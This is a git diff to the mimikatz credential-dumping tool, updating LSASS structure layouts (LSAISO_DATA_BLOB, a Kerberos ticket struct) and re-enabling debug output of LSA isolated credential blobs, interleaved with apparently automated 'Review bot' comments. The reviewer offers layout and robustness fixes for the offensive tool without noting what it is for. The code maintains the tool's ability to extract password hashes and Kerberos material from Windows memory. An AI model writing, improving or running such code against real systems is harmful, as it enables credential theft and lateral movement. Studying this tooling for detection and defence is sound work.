diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
index 1ac5cb9..720f996 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -992,7 +992,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL);
 }
 else
- kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
+ kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
 break;
 case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
 pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@@ -1164,7 +1164,7 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
 kprintf(L"\n\t * LSA Isolated Data: %.*S", blob->typeSize, blob->data);
 kprintf(L"\n\t Unk-Key : "); kull_m_string_wprintf_hex(blob->unkKeyData, 3*16, 0);
 kprintf(L"\n\t Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
- //kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
- //kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
- //kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
+ kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
+ kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
+ kull_m_string_wprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); kprintf(L", 5:0x%x", blob->unk5);
 }
\ No newline at end of file
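Review bot: The replacement offset expression `FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)` is an unexplained layout constant, and the identical expression now appears in the kwindbg.c hunk at -294 as well, so the two copies can drift apart on the next layout revision. A one-line comment at the call site, `// LSAISO blob starts sizeof(USHORT) past NtOwfPassword in this credential layout`, or a small static inline helper returning the PLSAISO_DATA_BLOB that both callers use, would document the invariant once. The cast is also taken without any visible check that the remaining buffer covers sizeof(LSAISO_DATA_BLOB); that check may live outside the hunk, since kuhl_m_sekurlsa_genericCredsOutput begins and ends beyond it.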
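Review bot: The newly enabled dump sizes `unkData2` with `sizeof(blob->unkData2)`, but the `unkKeyData` dump on the context line just above still hard-codes `3*16`, so the function is now inconsistent with itself; `kull_m_string_wprintf_hex(blob->unkKeyData, sizeof(blob->unkKeyData), 0);` matches the new style and survives a later array resize. The `%x` conversions applied to unk0–unk5 and `%u` to the size fields are paired with DWORD (unsigned long on Windows) arguments, which a strict format checker flags; `%lx`/`%lu` or an explicit cast removes the mismatch. The dump lengths `typeSize` and `origSize` are taken from the parsed blob and are not compared against `structSize` anywhere in the hunk, so a corrupt or unexpected blob over-reads past `data`; a guard before the dumps would be a cheap safeguard. The kwindbg.c hunk at -453 mirrors these lines with dprintf and has the same three points.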
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
index 2429003..f575bf5 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
@@ -183,7 +183,8 @@ typedef struct _LSAISO_DATA_BLOB {
 DWORD unk3;
 DWORD unk4;
 BYTE unkKeyData[3*16];
- BYTE unkEmpty[20];
+ BYTE unkData2[16];
+ DWORD unk5;
 DWORD origSize;
 BYTE data[ANYSIZE_ARRAY];
 } LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;
\ No newline at end of file
diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
index 591255a..45afeb0 100644
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
@@ -401,6 +401,8 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
 LSA_UNICODE_STRING Description;
 LSA_UNICODE_STRING AltTargetDomainName;
 LSA_UNICODE_STRING KDCServer; //?
+ DWORD unk10586_d;
+ PVOID unk10586_p;
 PKERB_EXTERNAL_NAME ClientName;
 PVOID name0;
 ULONG TicketFlags;
diff --git a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
index d177634..c7679eb 100644
--- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
+++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
@@ -470,7 +470,8 @@ typedef struct _LSAISO_DATA_BLOB {
 DWORD unk3;
 DWORD unk4;
 BYTE unkKeyData[3*16];
- BYTE unkEmpty[20];
+ BYTE unkData2[16];
+ DWORD unk5;
 DWORD origSize;
 BYTE data[ANYSIZE_ARRAY];
 } LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;
diff --git a/mimilib/sekurlsadbg/kwindbg.c b/mimilib/sekurlsadbg/kwindbg.c
index 5e0e462..e289eba 100644
--- a/mimilib/sekurlsadbg/kwindbg.c
+++ b/mimilib/sekurlsadbg/kwindbg.c
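Review bot: Splitting `BYTE unkEmpty[20]` into `BYTE unkData2[16]` plus `DWORD unk5` preserves the 20-byte span, so `origSize` and `data` stay at their previous offsets, but nothing in the header records that this equality is load-bearing. A comment on the new fields, `// 16 + 4 bytes replace the former unkEmpty[20]; origSize must not move`, or a C_ASSERT on `FIELD_OFFSET(LSAISO_DATA_BLOB, origSize)` against the pre-change value, would turn a silent layout break into a compile error. The same struct is duplicated verbatim in mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h (hunk at -470) and is edited in lockstep here; sharing one definition would remove that maintenance hazard. The struct's opening brace and leading fields are outside the hunk.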
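Review bot: Inserting `DWORD unk10586_d;` immediately before `PVOID unk10586_p;` introduces 4 bytes of alignment padding between them on x64 under default packing, so ClientName and every later field shift by 16 bytes on x64 but only 8 on x86; if that matches the observed layout it is fine, but the asymmetry is easy to "fix" by accident later. A comment stating the intent, `// two fields present from the build the name suggests (10586); the DWORD/PVOID pair is pointer-aligned, so x64 pads after the DWORD`, would make the layout self-describing. The identifiers encode the build number only by convention, which is hard to grep for; the comment should say which builds use this struct variant. The struct's opening and closing lines are outside the hunk.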
@@ -294,7 +294,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 }
 }
 else
- kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
+ kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
 break;
 case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
 pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@@ -453,9 +453,9 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
 dprintf("\n\t * LSA Isolated Data: %.*s", blob->typeSize, blob->data);
 dprintf("\n\t Unk-Key : "); kull_m_string_dprintf_hex(blob->unkKeyData, 3*16, 0);
 dprintf("\n\t Encrypted: "); kull_m_string_dprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
- //kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
- //kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
- //kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
+ dprintf("\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
+ dprintf("\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
+ kull_m_string_dprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); dprintf(", 5:0x%x", blob->unk5);
 }
 void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)